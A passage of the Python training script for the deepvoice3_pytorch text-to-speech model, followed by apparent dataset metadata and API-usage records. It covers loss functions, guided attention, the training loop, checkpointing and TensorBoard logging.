now\n alignment_dir = join(\n checkpoint_dir, \"alignment_layer{}\".format(i + 1))\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_{}_alignment.png\".format(\n global_step, i + 1))\n save_alignment(path, alignment)\n except Exception as e:\n warn(str(e))\n\n # Save averaged alignment\n alignment_dir = join(checkpoint_dir, \"alignment_ave\")\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_alignment.png\".format(global_step))\n alignment = attn.mean(0)[idx].cpu().data.numpy()\n save_alignment(path, alignment)\n tag = \"averaged_alignment\"\n\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Predicted mel spectrogram\n if mel_outputs is not None:\n mel_output = mel_outputs[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Predicted mel spectrogram\",\n mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted spectrogram\n if linear_outputs is not None:\n linear_output = linear_outputs[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Predicted linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted audio signal\n signal = audio.inv_spectrogram(linear_output.T)\n signal /= np.max(np.abs(signal))\n path = join(checkpoint_dir, \"step{:09d}_predicted.wav\".format(\n global_step))\n try:\n writer.add_audio(\"Predicted audio signal\", signal,\n global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n audio.save_wav(signal, path)\n\n # Target mel spectrogram\n if mel_outputs is not None:\n mel_output = mel[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Target mel spectrogram\", mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Target spectrogram\n if linear_outputs is not None:\n linear_output = y[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Target linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef logit(x, eps=1e-8):\n return torch.log(x + eps) - torch.log(1 - x + eps)\n\n\ndef masked_mean(y, mask):\n # (B, T, D)\n mask_ = mask.expand_as(y)\n return (y * mask_).sum() / mask_.sum()\n\n\ndef spec_loss(y_hat, y, mask, priority_bin=None, priority_w=0):\n masked_l1 = MaskedL1Loss()\n l1 = nn.L1Loss()\n\n w = hparams.masked_loss_weight\n\n # L1 loss\n if w > 0:\n assert mask is not None\n l1_loss = w * masked_l1(y_hat, y, mask=mask) + (1 - w) * l1(y_hat, y)\n else:\n assert mask is None\n l1_loss = l1(y_hat, y)\n\n # Priority L1 loss\n if priority_bin is not None and priority_w > 0:\n if w > 0:\n priority_loss = w * masked_l1(\n y_hat[:, :, :priority_bin], y[:, :, :priority_bin], mask=mask) \\\n + (1 - w) * l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n else:\n priority_loss = l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n l1_loss = (1 - priority_w) * l1_loss + priority_w * priority_loss\n\n # Binary divergence loss\n if hparams.binary_divergence_weight <= 0:\n binary_div = y.data.new(1).zero_()\n else:\n y_hat_logits = logit(y_hat)\n z = -y * y_hat_logits + torch.log1p(torch.exp(y_hat_logits))\n if w > 0:\n binary_div = w * masked_mean(z, mask) + (1 - w) * z.mean()\n else:\n binary_div = z.mean()\n\n return l1_loss, binary_div\n\n\n@jit(nopython=True)\ndef guided_attention(N, max_N, T, max_T, g):\n W = np.zeros((max_N, max_T), dtype=np.float32)\n for n in range(N):\n for t in range(T):\n W[n, t] = 1 - np.exp(-(n / N - t / T)**2 / (2 * g * g))\n return W\n\n\ndef guided_attentions(input_lengths, target_lengths, max_target_len, g=0.2):\n B = len(input_lengths)\n max_input_len = input_lengths.max()\n W = np.zeros((B, max_target_len, max_input_len), dtype=np.float32)\n for b in range(B):\n W[b] = guided_attention(input_lengths[b], max_input_len,\n target_lengths[b], max_target_len, g).T\n return W\n\n\ndef train(device, model, data_loader, optimizer, writer,\n init_lr=0.002,\n checkpoint_dir=None, checkpoint_interval=None, nepochs=None,\n clip_thresh=1.0,\n train_seq2seq=True, train_postnet=True):\n linear_dim = model.linear_dim\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n current_lr = init_lr\n\n binary_criterion = nn.BCELoss()\n\n assert train_seq2seq or train_postnet\n\n global global_step, global_epoch\n while global_epoch < nepochs:\n running_loss = 0.\n for step, (x, input_lengths, mel, y, positions, done, target_lengths,\n speaker_ids) \\\n in tqdm(enumerate(data_loader)):\n model.train()\n ismultispeaker = speaker_ids is not None\n # Learning rate schedule\n if hparams.lr_schedule is not None:\n lr_schedule_f = getattr(lrschedule, hparams.lr_schedule)\n current_lr = lr_schedule_f(\n init_lr, global_step, **hparams.lr_schedule_kwargs)\n for param_group in optimizer.param_groups:\n param_group['lr'] = current_lr\n optimizer.zero_grad()\n\n # Used for Position encoding\n text_positions, frame_positions = positions\n\n # Downsample mel spectrogram\n if downsample_step > 1:\n mel = mel[:, 0::downsample_step, :].contiguous()\n\n # Lengths\n input_lengths = input_lengths.long().numpy()\n decoder_lengths = target_lengths.long().numpy() // r // downsample_step\n\n max_seq_len = max(input_lengths.max(), decoder_lengths.max())\n if max_seq_len >= hparams.max_positions:\n raise RuntimeError(\n \"\"\"max_seq_len ({}) >= max_posision ({})\nInput text or decoder targget length exceeded the maximum length.\nPlease set a larger value for ``max_position`` in hyper parameters.\"\"\".format(\n max_seq_len, hparams.max_positions))\n\n # Transform data to CUDA device\n if train_seq2seq:\n x = x.to(device)\n text_positions = text_positions.to(device)\n frame_positions = frame_positions.to(device)\n if train_postnet:\n y = y.to(device)\n mel, done = mel.to(device), done.to(device)\n target_lengths = target_lengths.to(device)\n speaker_ids = speaker_ids.to(device) if ismultispeaker else None\n\n # Create mask if we use masked loss\n if hparams.masked_loss_weight > 0:\n # decoder output domain mask\n decoder_target_mask = sequence_mask(\n target_lengths // (r * downsample_step),\n max_len=mel.size(1)).unsqueeze(-1)\n if downsample_step > 1:\n # spectrogram-domain mask\n target_mask = sequence_mask(\n target_lengths, max_len=y.size(1)).unsqueeze(-1)\n else:\n target_mask = decoder_target_mask\n # shift mask\n decoder_target_mask = decoder_target_mask[:, r:, :]\n target_mask = target_mask[:, r:, :]\n else:\n decoder_target_mask, target_mask = None, None\n\n # Apply model\n if train_seq2seq and train_postnet:\n mel_outputs, linear_outputs, attn, done_hat = model(\n x, mel, speaker_ids=speaker_ids,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n elif train_seq2seq:\n assert speaker_ids is None\n mel_outputs, attn, done_hat, _ = model.seq2seq(\n x, mel,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n # reshape\n mel_outputs = mel_outputs.view(len(mel), -1, mel.size(-1))\n linear_outputs = None\n elif train_postnet:\n assert speaker_ids is None\n linear_outputs = model.postnet(mel)\n mel_outputs, attn, done_hat = None, None, None\n\n # Losses\n w = hparams.binary_divergence_weight\n\n # mel:\n if train_seq2seq:\n mel_l1_loss, mel_binary_div = spec_loss(\n mel_outputs[:, :-r, :], mel[:, r:, :], decoder_target_mask)\n mel_loss = (1 - w) * mel_l1_loss + w * mel_binary_div\n\n # done:\n if train_seq2seq:\n done_loss = binary_criterion(done_hat, done)\n\n # linear:\n if train_postnet:\n n_priority_freq = int(hparams.priority_freq / (hparams.sample_rate * 0.5) * linear_dim)\n linear_l1_loss, linear_binary_div = spec_loss(\n linear_outputs[:, :-r, :], y[:, r:, :], target_mask,\n priority_bin=n_priority_freq,\n priority_w=hparams.priority_freq_weight)\n linear_loss = (1 - w) * linear_l1_loss + w * linear_binary_div\n\n # Combine losses\n if train_seq2seq and train_postnet:\n loss = mel_loss + linear_loss + done_loss\n elif train_seq2seq:\n loss = mel_loss + done_loss\n elif train_postnet:\n loss = linear_loss\n\n # attention\n if train_seq2seq and hparams.use_guided_attention:\n soft_mask = guided_attentions(input_lengths, decoder_lengths,\n attn.size(-2),\n g=hparams.guided_attention_sigma)\n soft_mask = torch.from_numpy(soft_mask).to(device)\n attn_loss = (attn * soft_mask).mean()\n loss += attn_loss\n\n if global_step > 0 and global_step % checkpoint_interval == 0:\n save_states(\n global_step, writer, mel_outputs, linear_outputs, attn,\n mel, y, input_lengths, checkpoint_dir)\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n if global_step > 0 and global_step % hparams.eval_interval == 0:\n eval_model(global_step, writer, device, model,\n checkpoint_dir, ismultispeaker)\n\n # Update\n loss.backward()\n if clip_thresh > 0:\n grad_norm = torch.nn.utils.clip_grad_norm_(\n model.get_trainable_parameters(), clip_thresh)\n optimizer.step()\n\n # Logs\n writer.add_scalar(\"loss\", float(loss.item()), global_step)\n if train_seq2seq:\n writer.add_scalar(\"done_loss\", float(done_loss.item()), global_step)\n writer.add_scalar(\"mel loss\", float(mel_loss.item()), global_step)\n writer.add_scalar(\"mel_l1_loss\", float(mel_l1_loss.item()), global_step)\n writer.add_scalar(\"mel_binary_div_loss\", float(mel_binary_div.item()), global_step)\n if train_postnet:\n writer.add_scalar(\"linear_loss\", float(linear_loss.item()), global_step)\n writer.add_scalar(\"linear_l1_loss\", float(linear_l1_loss.item()), global_step)\n writer.add_scalar(\"linear_binary_div_loss\", float(linear_binary_div.item()), global_step)\n if train_seq2seq and hparams.use_guided_attention:\n writer.add_scalar(\"attn_loss\", float(attn_loss.item()), global_step)\n if clip_thresh > 0:\n writer.add_scalar(\"gradient norm\", grad_norm, global_step)\n writer.add_scalar(\"learning rate\", current_lr, global_step)\n\n global_step += 1\n running_loss += loss.item()\n\n averaged_loss = running_loss / (len(data_loader))\n writer.add_scalar(\"loss (per epoch)\", averaged_loss, global_epoch)\n print(\"Loss: {}\".format(running_loss / (len(data_loader))))\n\n global_epoch += 1\n\n\ndef save_checkpoint(model, optimizer, step, checkpoint_dir, epoch,\n train_seq2seq, train_postnet):\n if train_seq2seq and train_postnet:\n suffix = \"\"\n m = model\n elif train_seq2seq:\n suffix = \"_seq2seq\"\n m = model.seq2seq\n elif train_postnet:\n suffix = \"_postnet\"\n m = model.postnet\n\n checkpoint_path = join(\n checkpoint_dir, \"checkpoint_step{:09d}{}.pth\".format(global_step, suffix))\n optimizer_state = optimizer.state_dict() if hparams.save_optimizer_state else None\n torch.save({\n \"state_dict\": m.state_dict(),\n \"optimizer\": optimizer_state,\n \"global_step\": step,\n \"global_epoch\": epoch,\n }, checkpoint_path)\n print(\"Saved checkpoint:\", checkpoint_path)\n\n\ndef build_model():\n model = getattr(builder, hparams.builder)(\n n_speakers=hparams.n_speakers,\n speaker_embed_dim=hparams.speaker_embed_dim,\n n_vocab=_frontend.n_vocab,\n embed_dim=hparams.text_embed_dim,\n mel_dim=hparams.num_mels,\n linear_dim=hparams.fft_size // 2 + 1,\n r=hparams.outputs_per_step,\n downsample_step=hparams.downsample_step,\n padding_idx=hparams.padding_idx,\n dropout=hparams.dropout,\n kernel_size=hparams.kernel_size,\n encoder_channels=hparams.encoder_channels,\n decoder_channels=hparams.decoder_channels,\n converter_channels=hparams.converter_channels,\n use_memory_mask=hparams.use_memory_mask,\n trainable_positional_encodings=hparams.trainable_positional_encodings,\n force_monotonic_attention=hparams.force_monotonic_attention,\n use_decoder_state_for_postnet_input=hparams.use_decoder_state_for_postnet_input,\n max_positions=hparams.max_positions,\n speaker_embedding_weight_std=hparams.speaker_embedding_weight_std,\n freeze_embedding=hparams.freeze_embedding,\n window_ahead=hparams.window_ahead,\n window_backward=hparams.window_backward,\n key_projection=hparams.key_projection,\n value_projection=hparams.value_projection,\n )\n return model\n\n\ndef _load(checkpoint_path):\n if use_cuda:\n checkpoint = torch.load(checkpoint_path)\n else:\n checkpoint = torch.load(checkpoint_path,\n map_location=lambda storage, loc: storage)\n return checkpoint\n\n\ndef load_checkpoint(path, model, optimizer, reset_optimizer):\n global global_step\n global global_epoch\n\n print(\"Load checkpoint from: {}\".format(path))\n checkpoint = _load(path)\n model.load_state_dict(checkpoint[\"state_dict\"])\n if not reset_optimizer:\n optimizer_state = checkpoint[\"optimizer\"]\n if optimizer_state is not None:\n print(\"Load optimizer state from {}\".format(path))\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n global_step = checkpoint[\"global_step\"]\n global_epoch = checkpoint[\"global_epoch\"]\n\n return model\n\n\ndef _load_embedding(path, model):\n state = _load(path)[\"state_dict\"]\n key = \"seq2seq.encoder.embed_tokens.weight\"\n model.seq2seq.encoder.embed_tokens.weight.data = state[key]\n\n# https://discuss.pytorch.org/t/how-to-load-part-of-pre-trained-model/1113/3\n\n\ndef restore_parts(path, model):\n print(\"Restore part of the model from: {}\".format(path))\n state = _load(path)[\"state_dict\"]\n model_dict = model.state_dict()\n valid_state_dict = {k: v for k, v in state.items() if k in model_dict}\n\n try:\n model_dict.update(valid_state_dict)\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n # there should be invalid size of weight(s), so load them per parameter\n print(str(e))\n model_dict = model.state_dict()\n for k, v in valid_state_dict.items():\n model_dict[k] = v\n try:\n model.load_state_dict(model_dict)\n except RuntimeError as e:\n print(str(e))\n warn(\"{}: may contain invalid size of weight. skipping...\".format(k))\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__)\n print(\"Command line args:\\n\", args)\n checkpoint_dir = args[\"--checkpoint-dir\"]\n checkpoint_path = args[\"--checkpoint\"]\n checkpoint_seq2seq_path = args[\"--checkpoint-seq2seq\"]\n checkpoint_postnet_path = args[\"--checkpoint-postnet\"]\n load_embedding = args[\"--load-embedding\"]\n checkpoint_restore_parts = args[\"--restore-parts\"]\n speaker_id = args[\"--speaker-id\"]\n speaker_id = int(speaker_id) if speaker_id is not None else None\n preset = args[\"--preset\"]\n\n data_root = args[\"--data-root\"]\n if data_root is None:\n data_root = join(dirname(__file__), \"data\", \"ljspeech\")\n\n log_event_path = args[\"--log-event-path\"]\n reset_optimizer = args[\"--reset-optimizer\"]\n\n # Which model to be trained\n train_seq2seq = args[\"--train-seq2seq-only\"]\n train_postnet = args[\"--train-postnet-only\"]\n # train both if not specified\n if not train_seq2seq and not train_postnet:\n print(\"Training whole model\")\n train_seq2seq, train_postnet = True, True\n if train_seq2seq:\n print(\"Training seq2seq model\")\n elif train_postnet:\n print(\"Training postnet model\")\n else:\n assert False, \"must be specified wrong args\"\n\n # Load preset if specified\n if preset is not None:\n with open(preset) as f:\n hparams.parse_json(f.read())\n # Override hyper parameters\n hparams.parse(args[\"--hparams\"])\n\n # Preventing Windows specific error such as MemoryError\n # Also reduces the occurrence of THAllocator.c 0x05 error in Widows build of PyTorch\n if platform.system() == \"Windows\":\n print(\" [!] Windows Detected - IF THAllocator.c 0x05 error occurs SET num_workers to 1\")\n\n assert hparams.name == \"deepvoice3\"\n print(hparams_debug_string())\n\n _frontend = getattr(frontend, hparams.frontend)\n\n os.makedirs(checkpoint_dir, exist_ok=True)\n\n # Input dataset definitions\n X = FileSourceDataset(TextDataSource(data_root, speaker_id))\n Mel = FileSourceDataset(MelSpecDataSource(data_root, speaker_id))\n Y = FileSourceDataset(LinearSpecDataSource(data_root, speaker_id))\n\n # Prepare sampler\n frame_lengths = Mel.file_data_source.frame_lengths\n sampler = PartialyRandomizedSimilarTimeLengthSampler(\n frame_lengths, batch_size=hparams.batch_size)\n\n # Dataset and Dataloader setup\n dataset = PyTorchDataset(X, Mel, Y)\n data_loader = data_utils.DataLoader(\n dataset, batch_size=hparams.batch_size,\n num_workers=hparams.num_workers, sampler=sampler,\n collate_fn=collate_fn, pin_memory=hparams.pin_memory, drop_last=True)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Model\n model = build_model().to(device)\n\n optimizer = optim.Adam(model.get_trainable_parameters(),\n lr=hparams.initial_learning_rate, betas=(\n hparams.adam_beta1, hparams.adam_beta2),\n eps=hparams.adam_eps, weight_decay=hparams.weight_decay,\n amsgrad=hparams.amsgrad)\n\n if checkpoint_restore_parts is not None:\n restore_parts(checkpoint_restore_parts, model)\n\n # Load checkpoints\n if checkpoint_postnet_path is not None:\n load_checkpoint(checkpoint_postnet_path, model.postnet, optimizer, reset_optimizer)\n\n if checkpoint_seq2seq_path is not None:\n load_checkpoint(checkpoint_seq2seq_path, model.seq2seq, optimizer, reset_optimizer)\n\n if checkpoint_path is not None:\n load_checkpoint(checkpoint_path, model, optimizer, reset_optimizer)\n\n # Load embedding\n if load_embedding is not None:\n print(\"Loading embedding from {}\".format(load_embedding))\n _load_embedding(load_embedding, model)\n\n # Setup summary writer for tensorboard\n if log_event_path is None:\n if platform.system() == \"Windows\":\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"_\")\n else:\n log_event_path = \"log/run-test\" + str(datetime.now()).replace(\" \", \"_\")\n print(\"Log event path: {}\".format(log_event_path))\n writer = SummaryWriter(log_event_path)\n\n # Train!\n try:\n train(device, model, data_loader, optimizer, writer,\n init_lr=hparams.initial_learning_rate,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=hparams.checkpoint_interval,\n nepochs=hparams.nepochs,\n clip_thresh=hparams.clip_thresh,\n train_seq2seq=train_seq2seq, train_postnet=train_postnet)\n except KeyboardInterrupt:\n save_checkpoint(\n model, optimizer, global_step, checkpoint_dir, global_epoch,\n train_seq2seq, train_postnet)\n\n print(\"Finished\")\n sys.exit(0)\n", "repo_name": "r9y9/deepvoice3_pytorch", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 38196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1900, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 96, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 133, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 133, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 133, "usage_type": "name"}, {"api_name": "hparams.hparams.replace_pronunciation_prob", "line_number": 134, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 134, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 136, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 137, "usage_type": "argument"}, {"api_name": "numpy.random.rand", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams.gc_probability", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 139, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 149, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.sort", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 227, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 228, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 295, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 295, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 296, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 296, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 318, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 325, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 329, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 334, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 335, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 349, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 352, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 355, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 364, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 364, "usage_type": "name"}, {"api_name": "hparams.hparams.builder", "line_number": 369, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 369, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm.magma", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 376, "usage_type": "name"}, {"api_name": "synthesis._frontend", "line_number": 390, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 392, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 393, "usage_type": "call"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 400, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 400, "usage_type": "name"}, {"api_name": "synthesis.tts", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 410, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 415, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 415, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 417, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 424, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 427, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 429, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 433, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 433, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 435, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 454, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 455, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 457, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 460, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 467, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 475, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 476, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 478, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 483, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 488, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 494, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 499, "usage_type": "call"}, {"api_name": "audio.inv_spectrogram", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 509, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 509, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 511, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 513, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 518, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 522, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 528, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 533, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 549, "usage_type": "name"}, {"api_name": "hparams.hparams.masked_loss_weight", "line_number": 551, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 551, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 572, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 572, "usage_type": "name"}, {"api_name": "torch.log1p", "line_number": 576, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 587, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 590, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 597, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 597, "usage_type": "attribute"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 610, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 610, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 611, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 611, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 614, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 614, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 623, "usage_type": "call"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 627, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 627, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 628, "usage_type": "attribute"}, {"api_name": 